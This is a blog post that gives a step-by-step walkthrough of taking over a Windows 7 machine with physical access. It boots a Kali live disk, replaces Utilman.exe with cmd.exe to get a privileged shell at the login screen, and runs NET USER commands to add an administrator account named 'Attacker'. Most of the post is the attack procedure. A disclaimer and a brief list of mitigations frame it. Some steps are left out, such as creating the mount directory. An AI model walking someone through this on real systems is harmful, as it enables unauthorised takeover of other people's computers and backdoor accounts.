Disclaimer: First of all I would like to let you know that I don't held responsible for the misuse of the information stated here. This blog is only to let people know about the vulnerabilities, bugs, and security vectors that are out there since the companies that posses them do not even talk about it, so I bring it to the light to make people more aware of this issue. Since the first 10 amendments (the bill of rights) gives me the right to share information, here it is because knowledge is power.
Nowadays, someone does not need to know a lot about security's inner-workings of the Windows 7 Operating System to take total control of it. This simple procedure is so simple even a 10 year old can do it with the need of ONLY a Linux live CD or DVD (even a flash drive) to boot with BIOS. This procedure I like to call it application hijacking and there is no fix or way to defend this in the Windows Operating System side. However it can be diminished by putting a password on the BIOS but even that way it can be bypassed by taking the CMOS battery out resetting the BIOS password completely. This way will be too notorious if the owner of the computer checks the BIOS and realizes there is no prompt for password but it might be too late...
So here it is. First, we can see the Window Log in is totally normal. This attack relies on the "Ease of Access" button which helps people with dissabilities use the Operating System providing them with magnifying glass, on-screen keyboard, voice recognition, etc. As the name states "Easy of Access" now it becomes "Ease of Penetration Access" :)
With this said, we will try booting on BIOS but first we need to configure so it boots with CD-ROM, DVD-ROM or Flash-Drive (however your preference is).
After this, we boot with Linux. For this lab, we will use one of my favourites distros: Kali Linux (aka Backtrack 6).
We wait until all files, hardware, kernel and services are loaded and we will get prompted with the desktop. You can try it with CLI or GUI. It really does not matter as long as you use this proper commands:
First we create a directory where we will mount the physical hard-drive (where Windows 7 resides on). Note /dev/sda# will be your hard-drive if you are using SATA drive and /dev/hda# if you are using IDE hard-drive.
#mount /dev/sda1 /media/harddrive/
Now we will proceed to the hihjacking process but first we will make a backup to the "ease of access" file which is called "utilman.exe".
# mv Utilman.exe Utilman.Backup.exe
Now let's do the hijacking process with cmd.exe :)
#cp cmd.exe Utilman.exe
Reboot the system:
Now it is time to reboot the system, take out the CD, DVD or Flash-Drive, Change BIOS back to normal and let Windows start
After Windows start, let's click one more time to the "Ease of (Penetration) Access" button and "Viola!!", the CMD.exe window with ADMINISTRATOR privileges appears :)
Now, let's give ourselves Administrator Access with the username "Attacker":
NET USER ATTACKER /ADD
NET LOCALGROUP ADMINISTRATORS ATTACKER /ADD
Let's verify the user attacker is an administrator:
NET USER ATTACKER
You can also verify by seeing who is in our Administrator's group:
NET LOCALGROUP ADMINISTRATORS
Now it is time to login with our newly-super-user account:
Let's verify that the account we just logged in has administrator rights:
The lesson of this lab is not to teach anybody to break rules but to make users aware of the dangers big profit-glutton corporations like Microsoft. You can help securing your computer form this attack by 1) Disabling CD-ROM/DVD-ROM and USB External Storage. 2) Putting a BIOS password and 3) Removing CD-ROM, DVD-ROMs or buying a computer with not USB connections :-D
Big cheers to RS who made me aware of this security vector.
I hope you enjoyed it!